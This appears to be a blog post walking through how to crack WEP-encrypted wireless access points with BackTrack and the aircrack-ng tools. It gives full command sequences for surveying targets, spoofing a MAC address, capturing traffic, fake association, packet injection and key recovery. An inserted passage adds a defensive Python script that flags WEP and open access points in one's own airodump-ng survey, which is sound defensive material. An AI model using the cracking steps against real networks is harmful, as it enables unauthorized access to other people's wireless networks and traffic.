For this first post I'm going to do a brief scenario of how to break 802.11 WEP encrypted access points. I won't go into much detail at this time; I plan on doing a more detailed version soon including WPA and other forms of 802.11 encryption.
First off, go get yourself a copy of the BackTrack LiveCD. BackTrack is the best network security toolkit I have found to date, including my own personal build! I will be using BackTrack2 for this post, but BackTrack3 Beta should be very similar.
------------------------------------------------
First, boot into BackTrack and follow the directions on the screen. Log in as "root" with "toor" as your password, then type "startx" to start Gnome. The only reason we are starting X is simply to allow ease of multiple terminals. All of the steps to crack your WEP AP will be done in a terminal.
First thing we are going to do is see what access points are available using AiroDump. You do this by opening a terminal and typing the following (my card is wlan0, yours may vary depending on the manufacturer):
[root@codedrunk ~]# airodump-ng wlan0
You will see a list of access points, their power level in relation to you, their channel, MAC address, ESSID, and type of encryption being used. For now you will need to remember the ESSID, MAC Address, and channel.
** This step is entirely optional. I change the MAC of my wireless card just to make it easier later when I'll be typing it quite a bit. To do this use the following commands:
[root@codedrunk ~]# airmon-ng stop wlan0
[root@codedrunk ~]# ifconfig wlan0 down
[root@codedrunk ~]# macchanger --mac 00:11:22:33:44:55 wlan0
[root@codedrunk ~]# airmon-ng start wlan0
Now our MAC address is much easier to type and remember!
Now that we have our target access point we will need to start capturing packets. To do this we will again use AiroDump with a few options:
[root@codedrunk ~]# airodump-ng -c 10 -w dump_file_name --bssid MACofTargetAP wlan0
"-c 10" is the channel the AP is using, "-w dump_file_name" is the file prefix the captured packets are written to (airodump-ng writes a .cap and a .csv with that prefix), "--bssid MACofTargetAP" is the MAC address (BSSID) of the AP found when we used AiroDump the first time, and wlan0 is the capture interface. Here is an example of how it looks on my end:
[root@codedrunk ~]# airodump-ng -c 10 -w codedrunktest --bssid 00:c4:32:77:fa:9d wlan0
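The same survey output is useful from the other side of the table: the .csv that airodump-ng writes next to the .cap lists every AP it heard along with its Privacy column, so one pass over it tells you which of your own access points still run WEP or no encryption at all and should be migrated. The script below is an added example, not part of the original post or of the aircrack-ng suite; the CSV sample is constructed to follow airodump-ng's AP/station layout, reusing only the BSSID, ESSID and channel from the walkthrough above, and the station and other AP rows are made up.

```python
import csv
import io

# Constructed sample of an airodump-ng "<prefix>-01.csv" survey file.
# First table: access points; blank line; second table: stations.
# Only the codedrunk31 BSSID/ESSID/channel come from the walkthrough;
# every other value is invented for the example.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:c4:32:77:fa:9d, 2008-01-01 10:00:00, 2008-01-01 10:05:00, 10, 54, WEP, WEP, , -40, 120, 3041, 0. 0. 0. 0, 11, codedrunk31,
00:aa:bb:cc:dd:ee, 2008-01-01 10:00:00, 2008-01-01 10:05:00, 6, 54, WPA2, CCMP, PSK, -55, 98, 0, 0. 0. 0. 0, 8, homewpa2,
00:12:34:56:78:9a, 2008-01-01 10:00:00, 2008-01-01 10:05:00, 1, 54, OPN, , , -70, 40, 0, 0. 0. 0. 0, 5, guest,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:11:22:33:44:55, 2008-01-01 10:01:00, 2008-01-01 10:05:00, -30, 500, 00:c4:32:77:fa:9d,
"""


def parse_access_points(text):
    """Return the access-point table of an airodump-ng CSV as a list of dicts.

    airodump-ng separates fields with ", " and ends each row with a trailing
    comma; the AP table ends at the first blank line after its header.
    """
    aps = []
    header = None
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        if not row:
            if header is not None:
                break  # end of the AP table; the station table follows
            continue
        if row[0].strip() == "BSSID":
            header = [h.strip() for h in row]
            continue
        if header is None:
            continue  # anything before the AP header is ignored
        aps.append(dict(zip(header, (f.strip() for f in row))))
    return aps


def find_weak_access_points(text):
    """Flag APs whose Privacy column is WEP or open.

    Returns one dict per flagged AP with its BSSID, ESSID, channel, the IV
    count airodump-ng has already seen, and a label of "WEP" or "OPEN".
    A WEP AP is flagged regardless of IV count: the key is recoverable
    from enough captured IVs, so the fix is migration, not monitoring.
    """
    flagged = []
    for ap in parse_access_points(text):
        privacy = ap.get("Privacy", "")
        if "WEP" in privacy:
            label = "WEP"
        elif privacy in ("OPN", ""):
            label = "OPEN"
        else:
            continue  # WPA/WPA2 rows are not part of this inventory
        flagged.append({
            "bssid": ap["BSSID"],
            "essid": ap["ESSID"],
            "channel": int(ap["channel"]),
            "ivs": int(ap["# IV"]),
            "label": label,
        })
    return flagged


if __name__ == "__main__":
    # Point this at a real "<prefix>-01.csv" to inventory your own survey.
    for ap in find_weak_access_points(SAMPLE_CSV):
        print(f"{ap['label']:<4} ch{ap['channel']:>2} {ap['bssid']} "
              f"{ap['essid']!r} IVs seen={ap['ivs']}")
```

Run it against the -01.csv from a survey of your own site; an AP with a large "# IV" count in the WEP row is one that has already put a lot of keystream on the air, which makes it the first candidate for replacement.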
------------------------------------------------
Now that we have AiroDump capturing packets we need to stimulate a little network traffic. There are many ways of doing this; here I will show you the easiest method that doesn't require a client connected on the target network.
Leave AiroDump running and open another terminal. In this terminal we will use AiReplay to associate our wireless card with the target AP:
[root@codedrunk ~]# aireplay-ng -1 0 -e SSIDofTargetAP -a MACofTargetAP -h 00:11:22:33:44:55 wlan0
Here's how it looks on my end:
[root@codedrunk ~]# aireplay-ng -1 0 -e codedrunk31 -a 00:c4:32:77:fa:9d -h 00:11:22:33:44:55 wlan0
You should get a message stating the association was successful, and we're on to the next step.
Now we'll start injecting packets to get network traffic flowing and reduce the amount of time needed to capture enough good packets to obtain the encryption key.
[root@codedrunk ~]# aireplay-ng -3 -b MACofTargetAP -h 00:11:22:33:44:55 wlan0
Now that we're injecting and capturing packets we can start the actual crack.
[root@codedrunk ~]# aircrack-ng -b MACofTargetAP dump_file_name.cap
Here's what it looks like on my end:
[root@codedrunk ~]# aircrack-ng -b 00:c4:32:77:fa:9d codedrunktest.cap
Depending on your rate of capture you could have your WEP key in as little as 2 minutes! My next walkthrough will be similar, with the exception of including images. Enjoy!